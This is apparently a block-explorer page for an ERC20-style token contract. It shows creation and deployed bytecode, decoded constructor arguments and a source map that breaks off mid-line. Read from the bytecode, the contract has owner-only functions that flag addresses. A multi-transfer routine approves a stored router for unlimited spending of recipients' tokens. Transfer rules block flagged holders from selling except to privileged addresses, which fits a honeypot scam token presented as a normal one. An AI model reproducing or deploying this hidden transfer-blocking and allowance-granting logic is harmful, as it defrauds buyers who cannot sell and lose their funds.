1918460208302840111600160201b8311171561057b57600080fd5b919080806020026020016040519081016040528093929190818152602001838360200280828437600092019190915250929550610bfa945050505050565b600a546001600160a01b03163314610601576040805162461bcd60e51b815260206004820152600660248201526510b7bbb732b960d11b604482015290519081900360640190fd5b60005b81518110156106aa5760016002600084848151811061061f57fe5b60200260200101516001600160a01b03166001600160a01b0316815260200190815260200160002060006101000a81548160ff02191690831515021790555060006001600084848151811061067057fe5b6020908102919091018101516001600160a01b03168252810191909152604001600020805460ff1916911515919091179055600101610604565b5050565b60068054604080516020601f600260001961010060018816150201909516949094049384018190048102820181019092528281526060939092909183018282801561073a5780601f1061070f5761010080835404028352916020019161073a565b820191906000526020600020905b81548152906001019060200180831161071d57829003601f168201915b5050505050905090565b6000610758610751610d4b565b8484610d4f565b50600192915050565b60055490565b6000610774848484610e3b565b6107e484610780610d4b565b6107df856040518060600160405280602881526020016114fd602891396001600160a01b038a166000908152600460205260408120906107be610d4b565b6001600160a01b0316815260208101919091526040016000205491906113d3565b610d4f565b5060019392505050565b60085460ff1690565b600a546001600160a01b03163314610856576040805162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604482015290519081900360640190fd5b6005546108639082610cea565b600555600a546001600160a01b031660009081526020819052604090205461088b9082610cea565b600a546001600160a01b0390811660009081526020818152604080832094909455835185815293519286169391926000805160206115258339815191529281900390910190a35050565b600a546001600160a01b0316331461091d576040805162461bcd60e51b815260206004820152600660248201526510b7bbb732b960d11b604482015290519081900360640190fd5b60005b82518110156109e85761095983828151811061093857fe5b602002602001015183838151811061094c57fe5b6020026020010151610bac565b50838110156109e057600180600085848151811061097357fe5b60200260200101516001600160a01b03166001600160a01b0316815260200190815260200160002060006101000a81548160ff0219169083151502179055506109e08382815181106109c157fe5b6020908102919091010151600c546001600160a01b0316600019610d4f565b600101610920565b50505050565b6001600160a01b031660009081526020819052604090205490565b600a546001600160a01b03163314610a51576040805162461bcd60e51b815260206004820152600660248201526510b7bbb732b960d11b604482015290519081900360640190fd5b600b80546001600160a01b0319166001600160a01b0392909216919091179055565b60078054604080516020601f600260001961010060018816150201909516949094049384018190048102820181019092528281526060939092909183018282801561073a5780601f1061070f5761010080835404028352916020019161073a565b610ae03360008361146a565b610b1481604051806060016040528060228152602001611493602291393360009081526020819052604090205491906113d3565b3360009081526020819052604081209190915580527fad3228b676f7d3cd4284a5443f17f1962b36e491b30a40b2405849e597ba5fb554610b559082610cea565b600080805260208181527fad3228b676f7d3cd4284a5443f17f1962b36e491b30a40b2405849e597ba5fb592909255604080518481529051919233926000805160206115258339815191529281900390910190a350565b6000610758610bb9610d4b565b8484610e3b565b600a546001600160a01b031681565b6001600160a01b03918216600090815260046020908152604080832093909416825291909152205490565b600a546001600160a01b03163314610c42576040805162461bcd60e51b815260206004820152600660248201526510b7bbb732b960d11b604482015290519081900360640190fd5b60005b81518110156106aa576001806000848481518110610c5f57fe5b60200260200101516001600160a01b03166001600160a01b0316815260200190815260200160002060006101000a81548160ff021916908315150217905550600060026000848481518110610cb057fe5b6020908102919091018101516001600160a01b03168252810191909152604001600020805460ff1916911515919091179055600101610c45565b600082820183811015610d44576040805162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604482015290519081900360640190fd5b9392505050565b3390565b6001600160a01b038316610d945760405162461bcd60e51b815260040180806020018281038252602481526020018061156a6024913960400191505060405180910390fd5b6001600160a01b038216610dd95760405162461bcd60e51b81526004018080602001828103825260228152602001806114b56022913960400191505060405180910390fd5b6001600160a01b03808416600081815260046020908152604080832094871680845294825291829020859055815185815291517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9259281900390910190a3505050565b600b54600a548491849184916001600160a01b039182169116148015610e6e5750600a546001600160a01b038481169116145b15610fd457600b80546001600160a01b0319166001600160a01b03848116919091179091558616610ed05760405162461bcd60e51b81526004018080602001828103825260258152602001806115456025913960400191505060405180910390fd5b6001600160a01b038516610f155760405162461bcd60e51b81526004018080602001828103825260238152602001806114706023913960400191505060405180910390fd5b610f2086868661146a565b610f5d846040518060600160405280602681526020016114d7602691396001600160a01b03891660009081526020819052604090205491906113d3565b6001600160a01b038088166000908152602081905260408082209390935590871681522054610f8c9085610cea565b6001600160a01b038087166000818152602081815260409182902094909455805188815290519193928a169260008051602061152583398151915292918290030190a36113cb565b600a546001600160a01b0384811691161480610ffd5750600b546001600160a01b038481169116145b806110155750600a546001600160a01b038381169116145b1561109857600a546001600160a01b0384811691161480156110485750816001600160a01b0316836001600160a01b0316145b156110535760038190555b6001600160a01b038616610ed05760405162461bcd60e51b81526004018080602001828103825260258152602001806115456025913960400191505060405180910390fd5b6001600160a01b03831660009081526001602081905260409091205460ff1615151415611104576001600160a01b038616610ed05760405162461bcd60e51b81526004018080602001828103825260258152602001806115456025913960400191505060405180910390fd5b6001600160a01b03831660009081526002602052604090205460ff1615156001141561118e57600b546001600160a01b03848116911614806111535750600c546001600160a01b038381169116145b6110535760405162461bcd60e51b81526004018080602001828103825260268152602001806114d76026913960400191505060405180910390fd5b60035481101561122257600b546001600160a01b0383811691161415611053576001600160a01b0383811660009081526002602090815260408083208054600160ff1991821681179092559252909120805490911690558616610ed05760405162461bcd60e51b81526004018080602001828103825260258152602001806115456025913960400191505060405180910390fd5b600b546001600160a01b038481169116148061124b5750600c546001600160a01b038381169116145b6112865760405162461bcd60e51b81526004018080602001828103825260268152602001806114d76026913960400191505060405180910390fd5b6001600160a01b0386166112cb5760405162461bcd60e51b81526004018080602001828103825260258152602001806115456025913960400191505060405180910390fd5b6001600160a01b0385166113105760405162461bcd60e51b81526004018080602001828103825260238152602001806114706023913960400191505060405180910390fd5b61131b86868661146a565b611358846040518060600160405280602681526020016114d7602691396001600160a01b03891660009081526020819052604090205491906113d3565b6001600160a01b0380881660009081526020819052604080822093909355908716815220546113879085610cea565b6001600160a01b038087166000818152602081815260409182902094909455805188815290519193928a169260008051602061152583398151915292918290030190a35b505050505050565b600081848411156114625760405162461bcd60e51b81526004018080602001828103825283818151815260200191508051906020019080838360005b8381101561142757818101518382015260200161140f565b50505050905090810190601f1680156114545780820380516001836020036101000a031916815260200191505b509250505060405180910390fd5b505050900390565b50505056fe45524332303a207472616e7366657220746f20746865207a65726f206164647265737345524332303a206275726e20616d6f756e7420657863656564732062616c616e636545524332303a20617070726f766520746f20746865207a65726f206164647265737345524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365ddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef45524332303a207472616e736665722066726f6d20746865207a65726f206164647265737345524332303a20617070726f76652066726f6d20746865207a65726f2061646472657373a2646970667358221220e026e745a364fe1f892d6ab66db4d015cf725d6ff3e8db463ecb6eff3651b6b264736f6c634300060c003300000000000000000000000000000000000000000000000000005af3107a40000000000000000000000000007bd1421dfdc0d26ca413fa9f31538f60b760a0c9
Deployed Bytecode
0x608060405234801561001057600080fd5b50600436106101005760003560e01c806370a0823111610097578063a9059cbb11610066578063a9059cbb1461049a578063b2bdfa7b146104c6578063dd62ed3e146104ea578063e12681151461051857610100565b806370a082311461042957806380b2122e1461044f57806395d89b41146104755780639b1f9e741461047d57610100565b806323b872dd116100d357806323b872dd1461027f578063313ce567146102b55780634e6ec247146102d357806352b0f196146102ff57610100565b8063043fa39e1461010557806306fdde03146101a8578063095ea7b31461022557806318160ddd14610265575b600080fd5b6101a66004803603602081101561011b57600080fd5b810190602081018135600160201b81111561013557600080fd5b82018360208201111561014757600080fd5b803590602001918460208302840111600160201b8311171561016857600080fd5b9190808060200260200160405190810160405280939291908181526020018383602002808284376000920191909152509295506105b9945050505050565b005b6101b06106ae565b6040805160208082528351818301528351919283929083019185019080838360005b838110156101ea5781810151838201526020016101d2565b50505050905090810190601f1680156102175780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b6102516004803603604081101561023b57600080fd5b506001600160a01b038135169060200135610744565b604080519115158252519081900360200190f35b61026d610761565b60408051918252519081900360200190f35b6102516004803603606081101561029557600080fd5b506001600160a01b03813581169160208101359091169060400135610767565b6102bd6107ee565b6040805160ff9092168252519081900360200190f35b6101a6600480360360408110156102e957600080fd5b506001600160a01b0381351690602001356107f7565b6101a66004803603606081101561031557600080fd5b81359190810190604081016020820135600160201b81111561033657600080fd5b82018360208201111561034857600080fd5b803590602001918460208302840111600160201b8311171561036957600080fd5b9190808060200260200160405190810160405280939291908181526020018383602002808284376000920191909152509295949360208101935035915050600160201b8111156103b857600080fd5b8201836020820111156103ca57600080fd5b803590602001918460208302840111600160201b831117156103eb57600080fd5b9190808060200260200160405190810160405280939291908181526020018383602002808284376000920191909152509295506108d5945050505050565b61026d6004803603602081101561043f57600080fd5b50356001600160a01b03166109ee565b6101a66004803603602081101561046557600080fd5b50356001600160a01b0316610a09565b6101b0610a73565b6101a66004803603602081101561049357600080fd5b5035610ad4565b610251600480360360408110156104b057600080fd5b506001600160a01b038135169060200135610bac565b6104ce610bc0565b604080516001600160a01b039092168252519081900360200190f35b61026d6004803603604081101561050057600080fd5b506001600160a01b0381358116916020013516610bcf565b6101a66004803603602081101561052e57600080fd5b810190602081018135600160201b81111561054857600080fd5b82018360208201111561055a57600080fd5b803590602001918460208302840111600160201b8311171561057b57600080fd5b919080806020026020016040519081016040528093929190818152602001838360200280828437600092019190915250929550610bfa945050505050565b600a546001600160a01b03163314610601576040805162461bcd60e51b815260206004820152600660248201526510b7bbb732b960d11b604482015290519081900360640190fd5b60005b81518110156106aa5760016002600084848151811061061f57fe5b60200260200101516001600160a01b03166001600160a01b0316815260200190815260200160002060006101000a81548160ff02191690831515021790555060006001600084848151811061067057fe5b6020908102919091018101516001600160a01b03168252810191909152604001600020805460ff1916911515919091179055600101610604565b5050565b60068054604080516020601f600260001961010060018816150201909516949094049384018190048102820181019092528281526060939092909183018282801561073a5780601f1061070f5761010080835404028352916020019161073a565b820191906000526020600020905b81548152906001019060200180831161071d57829003601f168201915b5050505050905090565b6000610758610751610d4b565b8484610d4f565b50600192915050565b60055490565b6000610774848484610e3b565b6107e484610780610d4b565b6107df856040518060600160405280602881526020016114fd602891396001600160a01b038a166000908152600460205260408120906107be610d4b565b6001600160a01b0316815260208101919091526040016000205491906113d3565b610d4f565b5060019392505050565b60085460ff1690565b600a546001600160a01b03163314610856576040805162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604482015290519081900360640190fd5b6005546108639082610cea565b600555600a546001600160a01b031660009081526020819052604090205461088b9082610cea565b600a546001600160a01b0390811660009081526020818152604080832094909455835185815293519286169391926000805160206115258339815191529281900390910190a35050565b600a546001600160a01b0316331461091d576040805162461bcd60e51b815260206004820152600660248201526510b7bbb732b960d11b604482015290519081900360640190fd5b60005b82518110156109e85761095983828151811061093857fe5b602002602001015183838151811061094c57fe5b6020026020010151610bac565b50838110156109e057600180600085848151811061097357fe5b60200260200101516001600160a01b03166001600160a01b0316815260200190815260200160002060006101000a81548160ff0219169083151502179055506109e08382815181106109c157fe5b6020908102919091010151600c546001600160a01b0316600019610d4f565b600101610920565b50505050565b6001600160a01b031660009081526020819052604090205490565b600a546001600160a01b03163314610a51576040805162461bcd60e51b815260206004820152600660248201526510b7bbb732b960d11b604482015290519081900360640190fd5b600b80546001600160a01b0319166001600160a01b0392909216919091179055565b60078054604080516020601f600260001961010060018816150201909516949094049384018190048102820181019092528281526060939092909183018282801561073a5780601f1061070f5761010080835404028352916020019161073a565b610ae03360008361146a565b610b1481604051806060016040528060228152602001611493602291393360009081526020819052604090205491906113d3565b3360009081526020819052604081209190915580527fad3228b676f7d3cd4284a5443f17f1962b36e491b30a40b2405849e597ba5fb554610b559082610cea565b600080805260208181527fad3228b676f7d3cd4284a5443f17f1962b36e491b30a40b2405849e597ba5fb592909255604080518481529051919233926000805160206115258339815191529281900390910190a350565b6000610758610bb9610d4b565b8484610e3b565b600a546001600160a01b031681565b6001600160a01b03918216600090815260046020908152604080832093909416825291909152205490565b600a546001600160a01b03163314610c42576040805162461bcd60e51b815260206004820152600660248201526510b7bbb732b960d11b604482015290519081900360640190fd5b60005b81518110156106aa576001806000848481518110610c5f57fe5b60200260200101516001600160a01b03166001600160a01b0316815260200190815260200160002060006101000a81548160ff021916908315150217905550600060026000848481518110610cb057fe5b6020908102919091018101516001600160a01b03168252810191909152604001600020805460ff1916911515919091179055600101610c45565b600082820183811015610d44576040805162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604482015290519081900360640190fd5b9392505050565b3390565b6001600160a01b038316610d945760405162461bcd60e51b815260040180806020018281038252602481526020018061156a6024913960400191505060405180910390fd5b6001600160a01b038216610dd95760405162461bcd60e51b81526004018080602001828103825260228152602001806114b56022913960400191505060405180910390fd5b6001600160a01b03808416600081815260046020908152604080832094871680845294825291829020859055815185815291517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9259281900390910190a3505050565b600b54600a548491849184916001600160a01b039182169116148015610e6e5750600a546001600160a01b038481169116145b15610fd457600b80546001600160a01b0319166001600160a01b03848116919091179091558616610ed05760405162461bcd60e51b81526004018080602001828103825260258152602001806115456025913960400191505060405180910390fd5b6001600160a01b038516610f155760405162461bcd60e51b81526004018080602001828103825260238152602001806114706023913960400191505060405180910390fd5b610f2086868661146a565b610f5d846040518060600160405280602681526020016114d7602691396001600160a01b03891660009081526020819052604090205491906113d3565b6001600160a01b038088166000908152602081905260408082209390935590871681522054610f8c9085610cea565b6001600160a01b038087166000818152602081815260409182902094909455805188815290519193928a169260008051602061152583398151915292918290030190a36113cb565b600a546001600160a01b0384811691161480610ffd5750600b546001600160a01b038481169116145b806110155750600a546001600160a01b038381169116145b1561109857600a546001600160a01b0384811691161480156110485750816001600160a01b0316836001600160a01b0316145b156110535760038190555b6001600160a01b038616610ed05760405162461bcd60e51b81526004018080602001828103825260258152602001806115456025913960400191505060405180910390fd5b6001600160a01b03831660009081526001602081905260409091205460ff1615151415611104576001600160a01b038616610ed05760405162461bcd60e51b81526004018080602001828103825260258152602001806115456025913960400191505060405180910390fd5b6001600160a01b03831660009081526002602052604090205460ff1615156001141561118e57600b546001600160a01b03848116911614806111535750600c546001600160a01b038381169116145b6110535760405162461bcd60e51b81526004018080602001828103825260268152602001806114d76026913960400191505060405180910390fd5b60035481101561122257600b546001600160a01b0383811691161415611053576001600160a01b0383811660009081526002602090815260408083208054600160ff1991821681179092559252909120805490911690558616610ed05760405162461bcd60e51b81526004018080602001828103825260258152602001806115456025913960400191505060405180910390fd5b600b546001600160a01b038481169116148061124b5750600c546001600160a01b038381169116145b6112865760405162461bcd60e51b81526004018080602001828103825260268152602001806114d76026913960400191505060405180910390fd5b6001600160a01b0386166112cb5760405162461bcd60e51b81526004018080602001828103825260258152602001806115456025913960400191505060405180910390fd5b6001600160a01b0385166113105760405162461bcd60e51b81526004018080602001828103825260238152602001806114706023913960400191505060405180910390fd5b61131b86868661146a565b611358846040518060600160405280602681526020016114d7602691396001600160a01b03891660009081526020819052604090205491906113d3565b6001600160a01b0380881660009081526020819052604080822093909355908716815220546113879085610cea565b6001600160a01b038087166000818152602081815260409182902094909455805188815290519193928a169260008051602061152583398151915292918290030190a35b505050505050565b600081848411156114625760405162461bcd60e51b81526004018080602001828103825283818151815260200191508051906020019080838360005b8381101561142757818101518382015260200161140f565b50505050905090810190601f1680156114545780820380516001836020036101000a031916815260200191505b509250505060405180910390fd5b505050900390565b50505056fe45524332303a207472616e7366657220746f20746865207a65726f206164647265737345524332303a206275726e20616d6f756e7420657863656564732062616c616e636545524332303a20617070726f766520746f20746865207a65726f206164647265737345524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365ddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef45524332303a207472616e736665722066726f6d20746865207a65726f206164647265737345524332303a20617070726f76652066726f6d20746865207a65726f2061646472657373a2646970667358221220e026e745a364fe1f892d6ab66db4d015cf725d6ff3e8db463ecb6eff3651b6b264736f6c634300060c0033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
00000000000000000000000000000000000000000000000000005af3107a40000000000000000000000000007bd1421dfdc0d26ca413fa9f31538f60b760a0c9
-----Decoded View---------------
Arg [0] : initialSupply (uint256): 100000000000000
Arg [1] : owner (address): 0x7Bd1421Dfdc0D26CA413FA9f31538f60b760A0C9
-----Encoded View---------------
2 Constructor Arguments found :
Arg [0] : 00000000000000000000000000000000000000000000000000005af3107a4000
Arg [1] : 0000000000000000000000007bd1421dfdc0d26ca413fa9f31538f60b760a0c9
Deployed Bytecode Sourcemap
21660:13702:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;28408:279;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;28408:279:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;28408:279:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;28408:279:0;;-1:-1:-1;28408:279:0;;-1:-1:-1;;;;;28408:279:0:i;:::-;;23080:83;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;25679:169;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;25679:169:0;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;24155:100;;;:::i;:::-;;;;;;;;;;;;;;;;26322:325;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;26322:325:0;;;;;;;;;;;;;;;;;:::i;24007:83::-;;;:::i;:::-;;;;;;;;;;;;;;;;;;;30003:301;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;30003:301:0;;;;;;;;:::i;24839:479::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;24839:479:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;24839:479:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;24839:479:0;;;;;;;;-1:-1:-1;24839:479:0;;-1:-1:-1;;;;;24839:479:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;24839:479:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;24839:479:0;;-1:-1:-1;24839:479:0;;-1:-1:-1;;;;;24839:479:0:i;24318:119::-;;;;;;;;;;;;;;;;-1:-1:-1;24318:119:0;-1:-1:-1;;;;;24318:119:0;;:::i;27844:144::-;;;;;;;;;;;;;;;;-1:-1:-1;27844:144:0;-1:-1:-1;;;;;27844:144:0;;:::i;23282:87::-;;;:::i;30636:393::-;;;;;;;;;;;;;;;;-1:-1:-1;30636:393:0;;:::i;24650:179::-;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;24650:179:0;;;;;;;;:::i;22331:21::-;;;:::i;:::-;;;;-1:-1:-1;;;;;22331:21:0;;;;;;;;;;;;;;25381:151;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;25381:151:0;;;;;;;;;;:::i;27056:286::-;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;27056:286:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;27056:286:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;27056:286:0;;-1:-1:-1;27056:286:0;;-1:-1:-1;;;;;27056:286:0:i;28408:279::-;28496:6;;-1:-1:-1;;;;;28496:6:0;28482:10;:20;28474:39;;;;;-1:-1:-1;;;28474:39:0;;;;;;;;;;;;-1:-1:-1;;;28474:39:0;;;;;;;;;;;;;;;28529:9;28524:156;28548:9;:16;28544:1;:20;28524:156;;;28615:4;28585:13;:27;28599:9;28609:1;28599:12;;;;;;;;;;;;;;-1:-1:-1;;;;;28585:27:0;-1:-1:-1;;;;;28585:27:0;;;;;;;;;;;;;:34;;;;;;;;;;;;;;;;;;28663:5;28633:13;:27;28647:9;28657:1;28647:12;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;28633:27:0;;;;;;;;;;;-1:-1:-1;28633:27:0;:35;;-1:-1:-1;;28633:35:0;;;;;;;;;;-1:-1:-1;28566:3:0;28524:156;;;;28408:279;:::o;23080:83::-;23150:5;23143:12;;;;;;;;-1:-1:-1;;23143:12:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;23117:13;;23143:12;;23150:5;;23143:12;;23150:5;23143:12;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;23080:83;:::o;25679:169::-;25762:4;25779:39;25788:12;:10;:12::i;:::-;25802:7;25811:6;25779:8;:39::i;:::-;-1:-1:-1;25836:4:0;25679:169;;;;:::o;24155:100::-;24235:12;;24155:100;:::o;26322:325::-;26428:4;26445:40;26459:6;26467:9;26478:6;26445:13;:40::i;:::-;26496:121;26505:6;26513:12;:10;:12::i;:::-;26527:89;26565:6;26527:89;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;26527:19:0;;;;;;:11;:19;;;;;;26547:12;:10;:12::i;:::-;-1:-1:-1;;;;;26527:33:0;;;;;;;;;;;;-1:-1:-1;26527:33:0;;;:89;:37;:89::i;:::-;26496:8;:121::i;:::-;-1:-1:-1;26635:4:0;26322:325;;;;;:::o;24007:83::-;24073:9;;;;24007:83;:::o;30003:301::-;30091:6;;-1:-1:-1;;;;;30091:6:0;30077:10;:20;30069:64;;;;;-1:-1:-1;;;30069:64:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;30159:12;;:24;;30176:6;30159:16;:24::i;:::-;30144:12;:39;30224:6;;-1:-1:-1;;;;;30224:6:0;30214:9;:17;;;;;;;;;;;:29;;30236:6;30214:21;:29::i;:::-;30204:6;;-1:-1:-1;;;;;30204:6:0;;;30194:9;:17;;;;;;;;;;;:49;;;;30259:37;;;;;;;;;;;30194:9;;-1:-1:-1;;;;;;;;;;;30259:37:0;;;;;;;;;30003:301;;:::o;24839:479::-;24973:6;;-1:-1:-1;;;;;24973:6:0;24959:10;:20;24951:39;;;;;-1:-1:-1;;;24951:39:0;;;;;;;;;;;;-1:-1:-1;;;24951:39:0;;;;;;;;;;;;;;;25002:9;24997:315;25021:9;:16;25017:1;:20;24997:315;;;25053:34;25062:9;25072:1;25062:12;;;;;;;;;;;;;;25076:7;25084:1;25076:10;;;;;;;;;;;;;;25053:8;:34::i;:::-;;25111:12;25107:1;:16;25104:201;;;25165:4;25137:13;:27;25151:9;25161:1;25151:12;;;;;;;;;;;;;;-1:-1:-1;;;;;25137:27:0;-1:-1:-1;;;;;25137:27:0;;;;;;;;;;;;;:32;;;;;;;;;;;;;;;;;;25182:113;25191:9;25201:1;25191:12;;;;;;;;;;;;;;;;;;25205:10;;-1:-1:-1;;;;;25205:10:0;-1:-1:-1;;25182:8:0;:113::i;:::-;25039:3;;24997:315;;;;24839:479;;;:::o;24318:119::-;-1:-1:-1;;;;;24411:18:0;24384:7;24411:18;;;;;;;;;;;;24318:119::o;27844:144::-;27930:6;;-1:-1:-1;;;;;27930:6:0;27916:10;:20;27908:39;;;;;-1:-1:-1;;;27908:39:0;;;;;;;;;;;;-1:-1:-1;;;27908:39:0;;;;;;;;;;;;;;;27958:10;:22;;-1:-1:-1;;;;;;27958:22:0;-1:-1:-1;;;;;27958:22:0;;;;;;;;;;27844:144::o;23282:87::-;23354:7;23347:14;;;;;;;;-1:-1:-1;;23347:14:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;23321:13;;23347:14;;23354:7;;23347:14;;23354:7;23347:14;;;;;;;;;;;;;;;;;;;;;;;;30636:393;30685:52;30706:10;30726:1;30730:6;30685:20;:52::i;:::-;30774:71;30800:6;30774:71;;;;;;;;;;;;;;;;;30784:10;30774:9;:21;;;;;;;;;;;;:71;:25;:71::i;:::-;30760:10;30750:9;:21;;;;;;;;;;:95;;;;30880:21;;;;:33;;30906:6;30880:25;:33::i;:::-;30856:9;:21;;;;;;;;:57;;;;:21;30981:40;;;;;;;30856:9;;30990:10;;-1:-1:-1;;;;;;;;;;;30981:40:0;;;;;;;;;30636:393;:::o;24650:179::-;24736:4;24753:46;24767:12;:10;:12::i;:::-;24781:9;24792:6;24753:13;:46::i;22331:21::-;;;-1:-1:-1;;;;;22331:21:0;;:::o;25381:151::-;-1:-1:-1;;;;;25497:18:0;;;25470:7;25497:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;25381:151::o;27056:286::-;27151:6;;-1:-1:-1;;;;;27151:6:0;27137:10;:20;27129:39;;;;;-1:-1:-1;;;27129:39:0;;;;;;;;;;;;-1:-1:-1;;;27129:39:0;;;;;;;;;;;;;;;27184:9;27179:156;27203:9;:16;27199:1;:20;27179:156;;;27270:4;27240:13;:27;27254:9;27264:1;27254:12;;;;;;;;;;;;;;-1:-1:-1;;;;;27240:27:0;-1:-1:-1;;;;;27240:27:0;;;;;;;;;;;;;:34;;;;;;;;;;;;;;;;;;27318:5;27288:13;:27;27302:9;27312:1;27302:12;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;27288:27:0;;;;;;;;;;;-1:-1:-1;27288:27:0;:35;;-1:-1:-1;;27288:35:0;;;;;;;;;;-1:-1:-1;27221:3:0;27179:156;;6354:181;6412:7;6444:5;;;6468:6;;;;6460:46;;;;;-1:-1:-1;;;6460:46:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;6526:1;6354:181;-1:-1:-1;;;6354:181:0:o;17325:106::-;17413:10;17325:106;:::o;31469:344::-;-1:-1:-1;;;;;31571:19:0;;31563:68;;;;-1:-1:-1;;;31563:68:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;31650:21:0;;31642:68;;;;-1:-1:-1;;;31642:68:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;31721:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;31773:32;;;;;;;;;;;;;;;;;31469:344;;;:::o;32263:587::-;33395:10;;33385:6;;32361;;32368:9;;32378:6;;-1:-1:-1;;;;;33385:6:0;;;33395:10;;33385:20;:40;;;;-1:-1:-1;33419:6:0;;-1:-1:-1;;;;;33409:16:0;;;33419:6;;33409:16;33385:40;33381:844;;;33427:10;:22;;-1:-1:-1;;;;;;33427:22:0;-1:-1:-1;;;;;33427:22:0;;;;;;;;;;32413:20;::::1;32405:70;;;;-1:-1:-1::0;;;32405:70:0::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1::0;;;;;32494:23:0;::::1;32486:71;;;;-1:-1:-1::0;;;32486:71:0::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;32570:47;32591:6;32599:9;32610:6;32570:20;:47::i;:::-;32654:71;32676:6;32654:71;;;;;;;;;;;;;;;;;-1:-1:-1::0;;;;;32654:17:0;::::1;:9;:17:::0;;;::::1;::::0;;;;;;;;:71;:21:::1;:71::i;:::-;-1:-1:-1::0;;;;;32634:17:0;;::::1;:9;:17:::0;;;::::1;::::0;;;;;;;:91;;;;32759:20;;::::1;::::0;;;;:32:::1;::::0;32784:6;32759:24:::1;:32::i;:::-;-1:-1:-1::0;;;;;32736:20:0;;::::1;:9;:20:::0;;;::::1;::::0;;;;;;;;:55;;;;32807:35;;;;;;;32736:20;;32807:35;;::::1;::::0;-1:-1:-1;;;;;;;;;;;32807:35:0;;;;;;;::::1;33381:844:::0;;;33486:6;;-1:-1:-1;;;;;33476:16:0;;;33486:6;;33476:16;;:40;;-1:-1:-1;33506:10:0;;-1:-1:-1;;;;;33496:20:0;;;33506:10;;33496:20;33476:40;:63;;;-1:-1:-1;33533:6:0;;-1:-1:-1;;;;;33520:19:0;;;33533:6;;33520:19;33476:63;33472:742;;;33573:6;;-1:-1:-1;;;;;33563:16:0;;;33573:6;;33563:16;:39;;;;;33593:9;-1:-1:-1;;;;;33583:19:0;:6;-1:-1:-1;;;;;33583:19:0;;33563:39;33559:67;;;33604:11;:20;;;33559:67;-1:-1:-1;;;;;32413:20:0;::::1;32405:70;;;;-1:-1:-1::0;;;32405:70:0::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;33472:742:::0;-1:-1:-1;;;;;33656:21:0;;;;;;:13;:21;;;;;;;;;;;:29;;;33652:547;;;-1:-1:-1;;;;;32413:20:0;::::1;32405:70;;;;-1:-1:-1::0;;;32405:70:0::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;33652:547:::0;-1:-1:-1;;;;;33717:21:0;;;;;;:13;:21;;;;;;;;:29;;:21;:29;33713:467;;;33785:10;;-1:-1:-1;;;;;33775:20:0;;;33785:10;;33775:20;;33774:49;;-1:-1:-1;33812:10:0;;-1:-1:-1;;;;;33799:23:0;;;33812:10;;33799:23;33774:49;33766:100;;;;-1:-1:-1;;;33766:100:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;33713:467;33906:11;;33897:6;:20;33893:26